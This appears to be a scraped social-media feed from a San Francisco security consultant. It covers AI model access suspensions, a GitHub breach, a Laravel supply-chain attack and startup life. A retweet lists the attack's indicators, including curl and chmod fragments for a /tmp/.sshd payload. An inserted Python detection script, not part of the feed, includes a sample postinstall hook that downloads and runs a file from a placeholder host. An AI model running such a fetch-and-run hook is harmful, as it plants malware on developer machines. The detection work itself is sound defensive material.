Cybersecurity as a Service for defense fintech, healthtech, startups. 🦄 We make security & compliance easier. 😌 Founder of @RedCupIT 📍 SF

Joined October 2008
Jun 13
Now patiently waiting for the ITAR/EAR version of Fable/Mythos
Jun 13
gov keeps handing anthropic marketing Ws
3
76
Jun 13
Who’s going to write my emails now? 😭
As a result of a US government directive, we are suspending access to Claude Fable 5 for all users. You can continue to use all other Claude models. Here’s what this means for you: Across Claude products, new sessions will run on your selected default model or Opus 4.8, and existing Fable 5 sessions will end with an error. On the Claude Platform, requests to Fable 5 will also return an error. Please update your integrations to other Claude models. We know this is a disruption to your workflows; we appreciate your patience and support.
2
106
Dan Le retweeted
The US government, citing national security authorities, has issued an export control directive to suspend all access to Fable 5 and Mythos 5 by any foreign national, whether inside or outside the United States, including foreign national Anthropic employees. The net effect of this order is that we must abruptly disable Fable 5 and Mythos 5 for all our customers to ensure compliance. Access to all other Claude models is not affected. We apologize for this disruption to our customers. We believe this is a misunderstanding and are working to restore access as soon as possible. Read our full statement: anthropic.com/news/fable-myt…
3,595
7,232
44,435
12,556,734
‼️🚨 BREAKING: Another supply chain attack. 700 GitHub repositories flagged, including PHP and Node.js projects. The malicious script was planted across all of them. When a developer installs the package, the script silently downloads a Linux file from GitHub, hides it under the name /tmp/.sshd (so it looks like a normal system file), and runs it in the background. It also skips security checks on the download and hides any error messages. 8 PHP packages on Packagist (the main PHP code library) were confirmed infected. The attacker hid the script inside a JavaScript config file (package.json) instead of the PHP one (composer.json), so PHP developers reviewing their code would not notice it. The biggest risk is to devdojo/wave (6,400 stars) and devdojo/genesis (9,100 installs), both popular Laravel project templates. Developers who use these templates run the bad script the moment they install dependencies. The same payload was also dropped into GitHub Actions (automated build pipelines) under a fake step called "Dependency Cache Sync," meaning it could infect company build servers too. Packagist removed the bad packages, but the auto-updating versions (dev-main, dev-master, 3.x-dev) can quietly come back if the original repos stay infected. IOCs: GitHub account parikhpreyash4 repo systemd-network-helper-aa5c751f drop path /tmp/.sshd command fragments curl -skL and chmod x /tmp/.sshd.
79
545
3,185
242,367
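A defender-side check for the indicators listed in the post above, as an added example that is not part of the original post or of any project it names: it scans a repository's package.json scripts (even in a Composer project, since the post says the script was hidden there) and its GitHub Actions workflows for those strings. The function names, regexes and sample files are assumptions constructed for illustration.

```python
import json
import re

# Indicators quoted in the post above; the regexes are this example's own.
INDICATORS = {
    "payload-source": re.compile(r"parikhpreyash4|systemd-network-helper-aa5c751f"),
    "drop-path": re.compile(r"/tmp/\.sshd\b"),
    "curl-insecure-silent": re.compile(r"\bcurl\s+-skL\b"),
    "chmod-drop-path": re.compile(r"\bchmod\s+\+?x\s+/tmp/\.sshd\b"),
    "fake-ci-step": re.compile(r"Dependency Cache Sync"),
}

def match_indicators(text):  # names of every indicator present in a string
    return sorted(n for n, rx in INDICATORS.items() if rx.search(text))

def scan_package_json(raw):
    """Map npm script name -> indicators found in that script's command."""
    try:
        scripts = json.loads(raw).get("scripts")
    except (ValueError, AttributeError):
        scripts = None
    if not isinstance(scripts, dict):
        scripts = {"<unparsed>": raw}  # fall back to scanning the raw text
    hits = {k: match_indicators(str(v)) for k, v in scripts.items()}
    return {k: v for k, v in hits.items() if v}

def scan_workflow(raw):
    """(line_number, indicators) for each matching workflow line."""
    rows = ((n, match_indicators(l)) for n, l in enumerate(raw.splitlines(), 1))
    return [(n, hit) for n, hit in rows if hit]

def scan_repo(files):  # files: {relative_path: text}
    report = {}
    for path, text in files.items():
        found = None
        if path.endswith("package.json"):
            found = scan_package_json(text)
        elif path.startswith(".github/workflows/"):
            found = scan_workflow(text)
        if found:
            report[path] = found
    return report

SAMPLE_FILES = {  # constructed sample files, not real repository contents
    "composer.json": '{"require": {"php": "^8.2"}}',
    "package.json": json.dumps({"scripts": {"build": "vite build", "postinstall":
        "curl -skL https://example.invalid/x -o /tmp/.sshd; chmod +x /tmp/.sshd"}}),
    ".github/workflows/ci.yml": "steps:\n- name: Dependency Cache Sync\n  run: true\n",
}
```

Because the post notes that the auto-updating versions can come back while the original repos stay infected, a scan like this is worth repeating after each dependency update rather than running once.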
May 20
Endpoint security and knowing what’s installed on your device is more important than ever. Managing risk means controlling the flow of data into and out of your boundary, whether that’s your browser, IDE, VPS, SaaS, AI agent, or endpoint device. BRB while I reformat all of our computers 🙂‍↔️
May 20
1/ We are sharing additional details regarding our investigation into unauthorized access to GitHub's internal repositories. Yesterday we detected and contained a compromise of an employee device involving a poisoned VS Code extension. We removed the malicious extension version, isolated the endpoint, and began incident response immediately.
2
88
May 20
Wow. Goodbye supply chain security. Time to move to air-gapped repositories and CI/CD.
May 20
Replying to @github
2/ Our current assessment is that the activity involved exfiltration of GitHub-internal repositories only. The attacker’s current claims of ~3,800 repositories are directionally consistent with our investigation so far.
2
108
Dan Le retweeted
Modern Threat Modeling 101 Tip: Before Mythos came out we warned everyone to go into turtle mode in case you're late to the game (get everything off the internet as possible). In case you're super late to the game, get your employee SaaS apps off the internet. Almost all SaaS has SP-Initiated authentication built in to the implementation. Moreover, attackers are going to find authentication "bypasses" much easier now. SP-initiated authentication makes the SaaS enumerable from the internet for easy targeting. Now is not the time to have things on the internet. MFA will not save you. We left that era a couple years ago. You should be behind your SASE/ZTNA solution's dedicated IPs. If you are not requiring managed assets to access cloud resources, that means your cloud resources are accessible from the internet. Understand now?
4
14
71
4,006
Dan Le retweeted
Today is a hard day. I shared this note with the @linear team today: We’ve made the difficult decision to increase our workforce. This is not a cost-cutting exercise or a reflection of anyone’s performance. We’re simply reimagining every role for the agentic AI era. We’re hiring. We’re sorry about that.
449
639
13,980
986,710
Feb 17
Had this exact conversation today!
Feb 16
kinda ironic how the average work day is getting _harder_, as we progressively automate the easier parts of our daily jobs offloading them to agents. net result is that the average complexity of the tasks we still get to do is actually increasing insofar as we decide to still work the same number of hours (if not more), the more we offload to agents the harder our days will get lots of obvious confounders so not exactly direct causality, but since opus 4.5 i feel so much more tired. i get to accomplish crazy more - probably now doing what last year would've considered 3-4 distinct jobs, all at the same time. but at what price? pretty sure the current general anxiety in tech is not just that. could quite simply be lots of tiredness as we no longer get to code for hours in quiet flow, and have to uniquely narrow our focus to only the hardest pieces (or maybe i'm just projecting because this race is killing me lmao)
4
8
252
Dan Le retweeted
Replying to @Tylerbryy
Man I know exactly how. I don't need links. My constraint is time not capability.
6
2
123
6,679
Dan Le retweeted
Skills.md issue

2
1
28
3,244
Jan 9
Kids in 2025: "SIX... SEVEN!!" 🗣️ @claudeai in 2026: "For your 6-7 agent setup..." Even @AnthropicAI got the bug 😂
2
97
Jan 9
Made a Claudegotchi app that lives off of code commits and a 3js Pikachu that lives on my desktop and celebrates with every new commit 😂
1
1
88
24 Aug 2025
Second time in 3 months that I jump on a zoom call and we both happen to be a 2 minute walk from each other in SF and decide to meet IRL instead! SF = Serendipity Found!
1
1
9
953
24 Aug 2025
This is so true! The flywheel of success gets amplified and accelerated so much faster, especially if your roommates are also founders and in VC in SF
23 Aug 2025
Surround yourself with friends who randomly spend their time thinking about how you could be more successful, and do the same for them.
2
195
Dan Le retweeted
Compounding isn’t just for capital. It’s for reputation, relationships, and craft. Play long games.
51
327
2,090
141,489
Dan Le retweeted
19 May 2025
I asked @MayaKaczorowski (former Senior Director @github) about her thoughts about GitHub's identity system. Personally I think managing identity in GitHub is clear as mud.
1
5
13
1,616
11 May 2025
Best coworking spots in SF that are open weekends?
2
1
173